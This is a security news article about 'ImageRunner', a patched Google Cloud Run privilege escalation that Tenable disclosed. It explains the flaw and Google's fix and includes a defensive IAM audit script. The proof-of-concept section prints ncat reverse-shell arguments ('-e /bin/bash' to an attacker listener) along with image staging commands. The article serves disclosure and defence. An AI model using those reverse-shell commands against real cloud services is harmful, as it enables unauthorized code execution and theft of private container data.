Google Cloud Vulnerability Enables Privilege Escalation and Data Access

A critical privilege escalation vulnerability in Google Cloud Platform's (GCP) Cloud Run service, dubbed "ImageRunner," has been disclosed and subsequently patched by Google.

Discovered by Tenable Research, the flaw illustrated the risk created by interdependencies between cloud services: an identity holding two Cloud Run permissions, but no registry permissions at all, could read any private container image stored in the project's Google Artifact Registry or the now-deprecated Container Registry.

The Core of ImageRunner

Cloud Run is a serverless platform for running containerized applications. It retrieves container images from repositories such as Artifact Registry, the successor to Container Registry, which was shut down on March 18, 2025.

Artifact Registry supports multiple artifact types and offers fine-grained access control through Identity and Access Management (IAM) roles such as roles/artifactregistry.reader.

The vulnerability centered on the interaction between Cloud Run's service agent and these repositories. Service agents—Google-managed accounts created for a service—pull container images on the platform's behalf during deployment, and the Cloud Run service agent can read every image in the project. Because the pull was authorized with the service agent's permissions rather than the deployer's, the deploying principal's own access to the image was never checked.

Tenable found that an attacker holding run.services.update (to deploy a new revision of an existing service) and iam.serviceAccounts.actAs (to run that revision as the service's identity) could therefore reach private images without any direct registry permission.

Exploitation Mechanism

An attacker could modify an existing Cloud Run service to create a new deployment revision.

By pointing that revision at any private container image in the same project, they bypassed the image-specific permission check entirely, because the service agent, not the attacker, performed the pull.

This allowed malicious actors to:

  • Inspect private container images for sensitive data or secrets baked into their layers.
  • Override the container's command or arguments in the revision configuration.
  • Execute arbitrary code inside the private image and exfiltrate data from it.

Tenable's proof of concept first stages a private image to target: a public ncat image is pushed into the project's registry, standing in for any private image the low-privileged attacker cannot read. Note that this staging step requires registry write access and is performed by the image owner, not by the attacker:

docker pull raesene/ncat                                   # public ncat image used as the stand-in private image
gcloud auth login                                          # authenticate as an identity that can write to the registry
gcloud auth configure-docker                               # let docker use gcloud credentials for gcr.io
docker tag raesene/ncat gcr.io/{project-name}/ncat:latest  # retag into the target project's Container Registry
docker push gcr.io/{project-name}/ncat:latest              # the image is now private to the project

The attacker, holding only run.services.update and iam.serviceAccounts.actAs, then updates the Cloud Run service to a new revision that runs this image and overrides the container arguments so that ncat opens a reverse shell, using arguments like:

{Your nc listener IP} {Port} -e /bin/bash

Once the listener receives the connection, the attacker has a shell inside a container built from an image they were never authorized to read. This demonstrated how an authorization check anchored to the wrong identity, the service agent instead of the deploying principal, can lead to a severe breach.

The Jenga® Concept

Tenable referred to ImageRunner as an example of the "Jenga®" concept—a metaphor for how cloud providers build services atop one another.

If a lower layer inherits a weakness, every service stacked on it inherits that weakness too, and the risk cascades across dependent services. This highlights the need for authorization checks that hold at every layer of cloud infrastructure, not only at the one the customer configures directly.

Google’s Response and Fixes

In response to ImageRunner, Google implemented stricter IAM checks for Cloud Run deployments.

As of January 28, 2025, the principal (user or service account) creating or updating a Cloud Run resource must have explicit read permission on the container images the resource references, in addition to the permissions the service agent holds.

This ensures that even if an attacker gains run.services.update and iam.serviceAccounts.actAs, they cannot deploy, and therefore cannot read, a private image without an additional role such as Artifact Registry Reader (roles/artifactregistry.reader). The same check applies to legitimate deploy pipelines: an identity that lacks read access to the image now fails at deploy time, so that identity needs the reader role on the image's repository.

Google also notified affected customers ahead of the change.

This fix underscores the need for organizations to review IAM configurations regularly and to adhere to the principle of least privilege, in particular for identities that can deploy to Cloud Run.
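The permission combination above is straightforward to audit. The following script is an added example, not Tenable's or Google's code: it reads a project IAM policy in the JSON shape produced by `gcloud projects get-iam-policy PROJECT --format=json` and lists principals who hold run.services.update and iam.serviceAccounts.actAs but no role that grants Artifact Registry read access. Before the fix those principals were the ImageRunner escalation path; after it they are the identities whose deployments of private images fail. The policy document and the role-to-permission map are constructed sample data; regenerate the map from `gcloud iam roles describe ROLE --format=json` for the roles actually present in your policy.

```python
"""Audit a GCP project IAM policy for the ImageRunner permission pattern.

Added example (not Tenable's or Google's code). Caveats built into the check:
  * Only the project-level policy is examined. iam.serviceAccounts.actAs can
    also be granted on an individual service account resource, so a principal
    missing here may still hold it.
  * Image read access is judged by an Artifact Registry permission. Images in
    the legacy Container Registry were readable through storage.objects.get on
    the backing bucket, which this check does not consider.
"""
import json
from collections import defaultdict

UPDATE_PERM = "run.services.update"
ACTAS_PERM = "iam.serviceAccounts.actAs"
IMAGE_READ_PERM = "artifactregistry.repositories.downloadArtifacts"

# Constructed excerpt of includedPermissions for a few predefined roles.
# Regenerate with: gcloud iam roles describe ROLE --format=json
ROLE_PERMISSIONS = {
    "roles/run.developer": {UPDATE_PERM, "run.services.get", "run.services.list"},
    "roles/iam.serviceAccountUser": {ACTAS_PERM, "iam.serviceAccounts.get"},
    "roles/artifactregistry.reader": {IMAGE_READ_PERM, "artifactregistry.repositories.get"},
    "roles/run.viewer": {"run.services.get", "run.services.list"},
}

# Constructed sample policy in the shape of `gcloud projects get-iam-policy`.
SAMPLE_POLICY = json.dumps({
    "bindings": [
        {"role": "roles/run.developer",
         "members": ["user:dev@example.com",
                     "serviceAccount:ci@example-project.iam.gserviceaccount.com"]},
        {"role": "roles/iam.serviceAccountUser",
         "members": ["user:dev@example.com", "user:ops@example.com",
                     "serviceAccount:ci@example-project.iam.gserviceaccount.com"]},
        {"role": "roles/artifactregistry.reader",
         "members": ["serviceAccount:ci@example-project.iam.gserviceaccount.com"]},
        {"role": "roles/run.viewer", "members": ["user:auditor@example.com"]},
        {"role": "projects/example-project/roles/customDeployer",
         "members": ["user:contractor@example.com"]},
    ]
})


def permissions_by_principal(policy, role_permissions):
    """Expand each binding into the set of permissions every member holds.

    Returns (grants, unknown_roles). Roles absent from role_permissions are
    reported rather than silently treated as empty, so custom roles are not
    overlooked. Conditional bindings are counted as granted: a condition only
    narrows when the role applies, and ignoring it would hide findings.
    """
    grants = defaultdict(set)
    unknown_roles = set()
    for binding in policy.get("bindings", []):
        role = binding["role"]
        perms = role_permissions.get(role)
        if perms is None:
            unknown_roles.add(role)
            continue
        for member in binding.get("members", []):
            grants[member] |= perms
    return grants, unknown_roles


def find_imagerunner_candidates(policy_json, role_permissions=ROLE_PERMISSIONS):
    """Return principals that can deploy Cloud Run revisions but cannot read images."""
    policy = json.loads(policy_json)
    grants, unknown_roles = permissions_by_principal(policy, role_permissions)
    candidates = sorted(
        member for member, perms in grants.items()
        if UPDATE_PERM in perms and ACTAS_PERM in perms and IMAGE_READ_PERM not in perms
    )
    return {"candidates": candidates, "unknown_roles": sorted(unknown_roles)}


if __name__ == "__main__":
    result = find_imagerunner_candidates(SAMPLE_POLICY)
    for member in result["candidates"]:
        print(f"ImageRunner candidate (deploy without image read): {member}")
    for role in result["unknown_roles"]:
        print(f"expand this role and re-run: {role}")
```

In the sample policy only user:dev@example.com is flagged: the CI service account holds the reader role, ops lacks run.services.update, and the contractor's custom role is reported for expansion rather than assumed harmless.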

Transition from Container Registry to Artifact Registry

The vulnerability also underscores the benefits of completing the migration from Container Registry to Artifact Registry.

The latter offers:

  • Support for multiple artifact formats (e.g., Maven packages, Node.js modules) alongside container images.
  • Regional and multi-regional repositories, so images can be kept close to the workloads that pull them.
  • Fine-grained, per-repository IAM roles such as roles/artifactregistry.reader, rather than permissions on a storage bucket.

Key Takeaways

  1. Regularly Audit Permissions: Ensure that only essential roles are assigned to users and service accounts, and treat the combination of run.services.update and iam.serviceAccounts.actAs as a deployment-level privilege.
  2. Adopt Next-Generation Tools: Transitioning to Artifact Registry provides per-repository access control and broader format support.
  3. Monitor Dependencies: Understand which service identities act on your behalf and what they can reach, since interconnected services can introduce risk that no single IAM binding reveals.

ImageRunner serves as a reminder that even minor permission oversights can lead to significant vulnerabilities in cloud environments.

Organizations must stay proactive in securing their cloud infrastructure against evolving threats.

AnuPriya
AnuPriya is a cybersecurity reporter at Cyber Press, specializing in cyber attacks, dark web monitoring, data breaches, vulnerabilities, and malware. She delivers in-depth analysis on emerging threats and digital security trends.